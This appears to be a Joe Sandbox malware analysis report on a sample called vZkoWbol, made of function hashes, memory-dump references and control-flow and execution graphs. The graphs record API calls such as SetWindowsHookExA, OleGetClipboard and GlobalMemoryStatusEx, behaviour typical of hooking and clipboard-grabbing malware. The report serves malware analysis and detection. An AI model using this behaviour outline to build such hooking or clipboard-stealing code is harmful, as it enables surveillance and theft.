                                                                    Uniqueness Score: -1.00%

                                                                    Function 06637110 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: f395c59fc61863cadadf64a32d885302f10363a49eab4659e99022ff2f08ada8
                                                                    • Instruction ID: 9c628373f871a410e9579053984d9a452f123b506be20684876518dab0c1bd80
                                                                    • Opcode Fuzzy Hash: f395c59fc61863cadadf64a32d885302f10363a49eab4659e99022ff2f08ada8
                                                                    • Instruction Fuzzy Hash: CB112BB1D002498EDB24DFAAC4457EEFFF5EF88324F248419D419A7240CB795545CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06637118 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 873548cc07589c00d22aed0348aff0259cec4209e17df40c6d41d09abd98c401
                                                                    • Instruction ID: 48641fc8a4dccd478a2a77f74bd7219ef00860b70b949dd03edc084fc73a0876
                                                                    • Opcode Fuzzy Hash: 873548cc07589c00d22aed0348aff0259cec4209e17df40c6d41d09abd98c401
                                                                    • Instruction Fuzzy Hash: 6F1128B1D003498BDB20DFAAC8457EEFBF5EF89324F248419D519A7240CB79A544CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06639088 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0663B85D
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: bdb6fb4ef848bdcf78aabd4259be18bbba4260630631ba887d5afe6dcebd4f96
                                                                    • Instruction ID: 8db308b690936264a99daf37d56fd2cc1a8d7a514a9efa884320fd60d70c5dca
                                                                    • Opcode Fuzzy Hash: bdb6fb4ef848bdcf78aabd4259be18bbba4260630631ba887d5afe6dcebd4f96
                                                                    • Instruction Fuzzy Hash: E511F5B58003599FDB60DF99D885BDEFBF8FB58320F10841AE519A7240C3B9A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0170D034 Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 88c308c137222a2434a8075d6eca309a3107fd3348e20f52a9132c38ab140148
                                                                    • Instruction ID: 0d78b4ffc777d0f678bf5beb118e1128cf0cbc1ac3837921962c47546e0a16e6
                                                                    • Opcode Fuzzy Hash: 88c308c137222a2434a8075d6eca309a3107fd3348e20f52a9132c38ab140148
                                                                    • Instruction Fuzzy Hash: B931B37554C380CFD713CFA4D994715BFB1EF46214F19C5EAC4498B2A3C27A8806CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0170D055 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 72e8bfd04d6f9b4e71d781f6526217cd301245c375ce510b0f0609071f433e12
                                                                    • Instruction ID: 98b51d109ec05d03a28026019e0c1f9bef3ba6e763a36acc022f9834dfaa76db
                                                                    • Opcode Fuzzy Hash: 72e8bfd04d6f9b4e71d781f6526217cd301245c375ce510b0f0609071f433e12
                                                                    • Instruction Fuzzy Hash: 61318D71548380CFD713CFA4D994715BFB1EF46214F19C5EAD8898B2A7C33A980ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0170D294 Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a53c73b7f3a431b53d27009b1fee154c9748dda34346c660f7172043b8c7c79a
                                                                    • Instruction ID: 44a3bdcadaeef8d90f4624658e9627755b9aeca355100aa7f67481d103556b93
                                                                    • Opcode Fuzzy Hash: a53c73b7f3a431b53d27009b1fee154c9748dda34346c660f7172043b8c7c79a
                                                                    • Instruction Fuzzy Hash: 7E210371604304DFCB16DFD8C980B26FBA5FB88324F20C5A9D8090B292C37AD806CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0170D0DC Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 89e791c4825afc3ee3b729e75010f0af4a4ad7bc332fe38197b118966ed82678
                                                                    • Instruction ID: 21990d73e12bb650aaee448cbdfd8f1ec54e46f7b14c6f66e3c954bf65395bed
                                                                    • Opcode Fuzzy Hash: 89e791c4825afc3ee3b729e75010f0af4a4ad7bc332fe38197b118966ed82678
                                                                    • Instruction Fuzzy Hash: 8C21D371504304DFDB16DF98D980B26FBA5EB84314F20C5A9D9094B296C73AD846CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0170D28F Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: f03570d7ecbd7d3aaf344e721f9828343366e44e72ded0d6c1ab3020bde17cd6
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: DF11BB75504380CFDB12CF94D9C4B15FFA1FB84214F24C6A9D8494B292C33AD44ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:11%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:150
                                                                    Total number of Limit Nodes:19
                                                                    execution_graph 39704 134d044 39705 134d05c 39704->39705 39706 134d0b6 39705->39706 39711 6d40884 39705->39711 39719 6d42743 39705->39719 39723 6d46ed1 39705->39723 39732 6d42750 39705->39732 39712 6d4088f 39711->39712 39713 6d46f61 39712->39713 39715 6d46f51 39712->39715 39748 6d45edc 39713->39748 39736 6d47087 39715->39736 39742 6d47088 39715->39742 39716 6d46f5f 39716->39716 39720 6d42747 39719->39720 39721 6d40884 3 API calls 39720->39721 39722 6d42797 39721->39722 39722->39706 39724 6d46eda 39723->39724 39726 6d46eea 39723->39726 39724->39706 39725 6d46f61 39727 6d45edc 3 API calls 39725->39727 39726->39725 39728 6d46f51 39726->39728 39729 6d46f5f 39727->39729 39730 6d47087 3 API calls 39728->39730 39731 6d47088 3 API calls 39728->39731 39729->39729 39730->39729 39731->39729 39733 6d42776 39732->39733 39734 6d40884 3 API calls 39733->39734 39735 6d42797 39734->39735 39735->39706 39738 6d47088 39736->39738 39737 6d45edc 3 API calls 39737->39738 39738->39737 39739 6d4716e 39738->39739 39755 6d47551 39738->39755 39760 6d47560 39738->39760 39739->39716 39744 6d47096 39742->39744 39743 6d45edc 3 API calls 39743->39744 39744->39743 39745 6d4716e 39744->39745 39746 6d47560 2 API calls 39744->39746 39747 6d47551 2 API calls 39744->39747 39745->39716 39746->39744 39747->39744 39749 6d45ee7 39748->39749 39750 6d47274 39749->39750 39751 6d471ca 39749->39751 39753 6d40884 2 API calls 39750->39753 39752 6d47222 CallWindowProcW 39751->39752 39754 6d471d1 39751->39754 39752->39754 39753->39754 39754->39716 39756 6d47556 39755->39756 39757 6d47546 39756->39757 39765 6d47b07 39756->39765 39771 6d47b18 39756->39771 39757->39738 39761 6d4756c 39760->39761 39762 6d47546 39761->39762 39763 6d47b07 2 API calls 39761->39763 39764 6d47b18 2 API calls 39761->39764 39762->39738 39763->39761 39764->39761 39766 6d47b18 39765->39766 39767 6d47b34 39766->39767 39777 6d47b60 39766->39777 39789 6d47b51 39766->39789 39767->39756 39768 6d47b49 39768->39756 39773 6d47b20 39771->39773 39772 6d47b34 39772->39756 39773->39772 39775 6d47b60 2 API calls 39773->39775 39776 6d47b51 2 API calls 39773->39776 39774 6d47b49 39774->39756 39775->39774 39776->39774 39778 6d47b72 39777->39778 39779 6d47b8d 39778->39779 39781 6d47bd1 39778->39781 39787 6d47b60 2 API calls 39779->39787 39788 6d47b51 2 API calls 39779->39788 39780 6d47b93 39780->39768 39782 6d47c51 39781->39782 39801 6d47e18 39781->39801 39805 6d47e28 39781->39805 39809 6d47ec4 39781->39809 39782->39768 39783 6d47c6f 39783->39768 39787->39780 39788->39780 39790 6d47b5a 39789->39790 39791 6d47b8d 39790->39791 39793 6d47bd1 39790->39793 39799 6d47b60 2 API calls 39791->39799 39800 6d47b51 2 API calls 39791->39800 39792 6d47b93 39792->39768 39795 6d47c51 39793->39795 39796 6d47ec4 OleGetClipboard 39793->39796 39797 6d47e18 OleGetClipboard 39793->39797 39798 6d47e28 OleGetClipboard 39793->39798 39794 6d47c6f 39794->39768 39795->39768 39796->39794 39797->39794 39798->39794 39799->39792 39800->39792 39803 6d47e28 39801->39803 39804 6d47e63 39803->39804 39814 6d478f0 39803->39814 39804->39783 39807 6d47e2e 39805->39807 39806 6d478f0 OleGetClipboard 39806->39807 39807->39806 39808 6d47e63 39807->39808 39808->39783 39810 6d47ece OleGetClipboard 39809->39810 39812 6d47e7f 39809->39812 39813 6d47f6a 39810->39813 39812->39783 39815 6d47ed0 OleGetClipboard 39814->39815 39817 6d47f6a 39815->39817 39682 6d462f0 39683 6d462f6 DuplicateHandle 39682->39683 39684 6d46386 39683->39684 39685 6d414f0 39686 6d41532 39685->39686 39687 6d41538 GetModuleHandleW 39685->39687 39686->39687 39688 6d41565 39687->39688 39689 6d49a10 39690 6d49a54 SetWindowsHookExA 39689->39690 39692 6d49a9a 39690->39692 39818 6d47480 39819 6d47488 39818->39819 39821 6d474ab 39819->39821 39822 6d45f34 39819->39822 39823 6d474c0 KiUserCallbackDispatcher 39822->39823 39825 6d4752e 39823->39825 39825->39819 39826 13d0848 39828 13d084e 39826->39828 39827 13d091b 39828->39827 39830 13d132f 39828->39830 39832 13d1333 39830->39832 39831 13d1434 39831->39828 39832->39831 39834 13d7e58 39832->39834 39835 13d7e62 39834->39835 39836 13d7ea4 39835->39836 39842 6d5f939 39835->39842 39847 6d5f948 39835->39847 39836->39832 39837 13d7e75 39852 13deb09 39837->39852 39857 13deb18 39837->39857 39844 6d5f947 39842->39844 39843 6d5fb72 39843->39837 39844->39843 39845 6d5fb87 GlobalMemoryStatusEx 39844->39845 39846 6d5fde0 GlobalMemoryStatusEx 39844->39846 39845->39844 39846->39844 39849 6d5f953 39847->39849 39848 6d5fb72 39848->39837 39849->39848 39850 6d5fb87 GlobalMemoryStatusEx 39849->39850 39851 6d5fde0 GlobalMemoryStatusEx 39849->39851 39850->39849 39851->39849 39854 13deb18 39852->39854 39853 13ded79 39853->39836 39854->39853 39855 6d5fb87 GlobalMemoryStatusEx 39854->39855 39856 6d5fde0 GlobalMemoryStatusEx 39854->39856 39855->39854 39856->39854 39858 13deb32 39857->39858 39859 13ded79 39858->39859 39860 6d5fb87 GlobalMemoryStatusEx 39858->39860 39861 6d5fde0 GlobalMemoryStatusEx 39858->39861 39859->39836 39860->39858 39861->39858 39693 6d42598 39694 6d42600 CreateWindowExW 39693->39694 39696 6d426bc 39694->39696 39697 6d47d38 39698 6d47d43 39697->39698 39700 6d47d53 39698->39700 39701 6d4608c 39698->39701 39702 6d47d88 OleInitialize 39701->39702 39703 6d47dec 39702->39703 39703->39700

                                                                    Executed Functions

                                                                    Function 06D53070 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 6d53070-6d53091 1 6d53093-6d53096 0->1 2 6d530bc-6d530bf 1->2 3 6d53098-6d530b7 1->3 4 6d530c5-6d530e4 2->4 5 6d53860-6d53862 2->5 3->2 13 6d530e6-6d530e9 4->13 14 6d530fd-6d53107 4->14 6 6d53864 5->6 7 6d53869-6d5386c 5->7 6->7 7->1 10 6d53872-6d5387b 7->10 13->14 15 6d530eb-6d530fb 13->15 18 6d5310d-6d5311c 14->18 15->18 126 6d5311e call 6d53890 18->126 127 6d5311e call 6d53888 18->127 19 6d53123-6d53128 20 6d53135-6d53412 19->20 21 6d5312a-6d53130 19->21 42 6d53852-6d5385f 20->42 43 6d53418-6d534c7 20->43 21->10 52 6d534f0 43->52 53 6d534c9-6d534ee 43->53 54 6d534f9-6d5350c 52->54 53->54 57 6d53512-6d53534 54->57 58 6d53839-6d53845 54->58 57->58 61 6d5353a-6d53544 57->61 58->43 59 6d5384b 58->59 59->42 61->58 62 6d5354a-6d53555 61->62 62->58 63 6d5355b-6d53631 62->63 75 6d53633-6d53635 63->75 76 6d5363f-6d5366f 63->76 75->76 80 6d53671-6d53673 76->80 81 6d5367d-6d53689 76->81 80->81 82 6d536e9-6d536ed 81->82 83 6d5368b-6d5368f 81->83 84 6d536f3-6d5372f 82->84 85 6d5382a-6d53833 82->85 83->82 86 6d53691-6d536bb 83->86 96 6d53731-6d53733 84->96 97 6d5373d-6d5374b 84->97 85->58 85->63 93 6d536bd-6d536bf 86->93 94 6d536c9-6d536e6 86->94 93->94 94->82 96->97 100 6d53762-6d5376d 97->100 101 6d5374d-6d53758 97->101 104 6d53785-6d53796 100->104 105 6d5376f-6d53775 100->105 101->100 106 6d5375a 101->106 110 6d537ae-6d537ba 104->110 111 6d53798-6d5379e 104->111 107 6d53777 105->107 108 6d53779-6d5377b 105->108 106->100 107->104 108->104 115 6d537d2-6d53823 110->115 116 6d537bc-6d537c2 110->116 112 6d537a0 111->112 113 6d537a2-6d537a4 111->113 112->110 113->110 115->85 117 6d537c4 116->117 118 6d537c6-6d537c8 116->118 117->115 118->115 126->19 127->19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3723351465
                                                                    • Opcode ID: e4f6fd880f74e144c2972ae57df01e10e1ffbec8301d7296958f77bf26d74018
                                                                    • Instruction ID: 299a11c5024669cd4c06f319a763f0e19c377a8ab28991bcaadd542bb3f1858d
                                                                    • Opcode Fuzzy Hash: e4f6fd880f74e144c2972ae57df01e10e1ffbec8301d7296958f77bf26d74018
                                                                    • Instruction Fuzzy Hash: 38323D31E1061ACBCB14DF79D89459DB7B2FFC9340F21C6AAD449A7264EB30AD85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D57D60 Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 668 6d57d60-6d57d7e 669 6d57d80-6d57d83 668->669 670 6d57d85-6d57da1 669->670 671 6d57da6-6d57da9 669->671 670->671 672 6d57dc0-6d57dc3 671->672 673 6d57dab-6d57db9 671->673 674 6d57dc5-6d57ddf 672->674 675 6d57de4-6d57de7 672->675 680 6d57e06-6d57e1c 673->680 681 6d57dbb 673->681 674->675 677 6d57df4-6d57df6 675->677 678 6d57de9-6d57df3 675->678 684 6d57dfd-6d57e00 677->684 685 6d57df8 677->685 688 6d58037-6d58041 680->688 689 6d57e22-6d57e2b 680->689 681->672 684->669 684->680 685->684 690 6d57e31-6d57e4e 689->690 691 6d58042-6d58077 689->691 700 6d58024-6d58031 690->700 701 6d57e54-6d57e7c 690->701 694 6d58079-6d5807c 691->694 696 6d5809f-6d580a2 694->696 697 6d5807e-6d5809a 694->697 698 6d582d7-6d582da 696->698 699 6d580a8-6d580b7 696->699 697->696 703 6d58385-6d58387 698->703 704 6d582e0-6d582ec 698->704 711 6d580d6-6d5811a 699->711 712 6d580b9-6d580d4 699->712 700->688 700->689 701->700 723 6d57e82-6d57e8b 701->723 706 6d5838e-6d58391 703->706 707 6d58389 703->707 710 6d582f7-6d582f9 704->710 706->694 713 6d58397-6d583a0 706->713 707->706 714 6d58311-6d58315 710->714 715 6d582fb-6d58301 710->715 725 6d58120-6d58131 711->725 726 6d582ab-6d582c1 711->726 712->711 719 6d58317-6d58321 714->719 720 6d58323 714->720 717 6d58305-6d58307 715->717 718 6d58303 715->718 717->714 718->714 724 6d58328-6d5832a 719->724 720->724 723->691 727 6d57e91-6d57ead 723->727 728 6d5832c-6d5832f 724->728 729 6d5833b-6d58374 724->729 735 6d58137-6d58154 725->735 736 6d58296-6d582a5 725->736 726->698 737 6d57eb3-6d57edd 727->737 738 6d58012-6d5801e 727->738 728->713 729->699 750 6d5837a-6d58384 729->750 735->736 747 6d5815a-6d58250 call 6d56578 735->747 736->725 736->726 752 6d57ee3-6d57f0b 737->752 753 6d58008-6d5800d 737->753 738->700 738->723 801 6d58252-6d5825c 747->801 802 6d5825e 747->802 752->753 759 6d57f11-6d57f3f 752->759 753->738 759->753 765 6d57f45-6d57f4e 759->765 765->753 766 6d57f54-6d57f86 765->766 774 6d57f91-6d57fad 766->774 775 6d57f88-6d57f8c 766->775 774->738 777 6d57faf-6d58006 call 6d56578 774->777 775->753 776 6d57f8e 775->776 776->774 777->738 803 6d58263-6d58265 801->803 802->803 803->736 804 6d58267-6d5826c 803->804 805 6d5826e-6d58278 804->805 806 6d5827a 804->806 807 6d5827f-6d58281 805->807 806->807 807->736 808 6d58283-6d5828f 807->808 808->736
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q
                                                                    • API String ID: 0-127220927
                                                                    • Opcode ID: dc4ad9b7f0a86a69bbf991b8d98c06f2c78b1602a6309943bdbcb1a53b72c8a1
                                                                    • Instruction ID: c7b2c5f84dcc2e159a96a05d1e422e03bd846b934988b17fcb45b0857a3e8e31
                                                                    • Opcode Fuzzy Hash: dc4ad9b7f0a86a69bbf991b8d98c06f2c78b1602a6309943bdbcb1a53b72c8a1
                                                                    • Instruction Fuzzy Hash: 81028C30B002159FDF58DF69D990AAEB7E2FF84214F158529D806DB790DB39EC86CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D52342 Relevance: 1.0, Instructions: 1023COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f115f1929d1d80b1d8df7b7f8b5b4370c1e72a7dd31669b2037bfaa193e63d41
                                                                    • Instruction ID: 3bab66e2d9caea911434ca174ab8fab9b0ddeddc2a0d3e78072656791a0fd6ee
                                                                    • Opcode Fuzzy Hash: f115f1929d1d80b1d8df7b7f8b5b4370c1e72a7dd31669b2037bfaa193e63d41
                                                                    • Instruction Fuzzy Hash: FC925734A002048FDB64DF68C584A9DBBF2FF48314F5684A9D809DB765DB35ED89CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D565C8 Relevance: .8, Instructions: 833COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9890c496549d916508a47276043bc5c44be65ceb47983804c73be7f4c6d08666
                                                                    • Instruction ID: 8a1ba4b6bfc7cd5fecf6c101329115a1a871aacf8444d295aeb37ed8abe31178
                                                                    • Opcode Fuzzy Hash: 9890c496549d916508a47276043bc5c44be65ceb47983804c73be7f4c6d08666
                                                                    • Instruction Fuzzy Hash: F362BF34B002448FDF54DB68D590AADB7F2EF84354F668469E806DB7A0DB39EC46CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5C168 Relevance: .6, Instructions: 648COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7460a642cc77a6115b24ebca2e8ce2d5f5dc5720913a25c6c40a9a796ae015fc
                                                                    • Instruction ID: d4a5fd38983a14689b3c7362dbfb283a2730255d51b6f812c43cf5cd08d947e7
                                                                    • Opcode Fuzzy Hash: 7460a642cc77a6115b24ebca2e8ce2d5f5dc5720913a25c6c40a9a796ae015fc
                                                                    • Instruction Fuzzy Hash: 8E328D34B102098FDF54DB68D890BAEB7B6EF88314F118529E805EB754DB39EC46CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5B2B9 Relevance: .6, Instructions: 611COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e62d6f01b18687379a06baa921470156dcb67890f292520f0d34d0c8cd40d24
                                                                    • Instruction ID: 7b57a2622e3cca581d8555a067ba2b2d2800e69c9598e1db4f37c5d2913e489c
                                                                    • Opcode Fuzzy Hash: 0e62d6f01b18687379a06baa921470156dcb67890f292520f0d34d0c8cd40d24
                                                                    • Instruction Fuzzy Hash: 3B227370E102098FDF64CB69D5A07ADB7B6EF85314F218826D819EB791CB38DC85CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D555A8 Relevance: .6, Instructions: 594COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f16ca3aa06bbd118d884e3212735d1b5c1f58478022b1881f8cfd82f83342f8
                                                                    • Instruction ID: 2a885b1855619fceaa41400652c0095d1cd36fd54fec3940ec47037502feeb96
                                                                    • Opcode Fuzzy Hash: 2f16ca3aa06bbd118d884e3212735d1b5c1f58478022b1881f8cfd82f83342f8
                                                                    • Instruction Fuzzy Hash: B412D235F002159BDF65DBA4E8806AEBBB2FF85310F258569D84ADB740DB38DC42CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D59130 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 128 6d59130-6d59155 129 6d59157-6d5915a 128->129 130 6d59160-6d59175 129->130 131 6d59a18-6d59a1b 129->131 139 6d59177-6d5917d 130->139 140 6d5918d-6d591b0 130->140 132 6d59a41-6d59a43 131->132 133 6d59a1d-6d59a3c 131->133 134 6d59a45 132->134 135 6d59a4a-6d59a4d 132->135 133->132 134->135 135->129 137 6d59a53-6d59a5d 135->137 141 6d59181-6d59183 139->141 142 6d5917f 139->142 146 6d591b2-6d591b7 140->146 147 6d591c8-6d5922d 140->147 141->140 142->140 148 6d5922e-6d59239 146->148 149 6d591b8 146->149 147->148 154 6d59265-6d59281 148->154 155 6d5923b-6d5925e 148->155 151 6d591bc-6d591be 149->151 152 6d591b9-6d591ba 149->152 151->147 152->147 163 6d59283-6d592a6 154->163 164 6d592ad-6d592c8 154->164 155->154 163->164 171 6d592f3-6d5930e 164->171 172 6d592ca-6d592ec 164->172 178 6d59310-6d5932c 171->178 179 6d59333-6d59341 171->179 172->171 178->179 180 6d59351-6d593cb 179->180 181 6d59343-6d5934c 179->181 187 6d593cd-6d593eb 180->187 188 6d59418-6d5942d 180->188 181->137 192 6d59407-6d59416 187->192 193 6d593ed-6d593fc 187->193 188->131 192->187 192->188 193->192
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: 85e1f8430bcb9d987f363ad4c546353bdd5d59cc0623b01bf378627c936258a8
                                                                    • Instruction ID: c46263af2a59d9a1491341e7cac21d58a83ac829c11402e10447994eb47a819c
                                                                    • Opcode Fuzzy Hash: 85e1f8430bcb9d987f363ad4c546353bdd5d59cc0623b01bf378627c936258a8
                                                                    • Instruction Fuzzy Hash: 68914F30B4021A9FDB94DF69D960BAEB3F6FFC4244F118469C809EB744EE749C468B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5CF30 Relevance: 4.6, Strings: 3, Instructions: 802COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
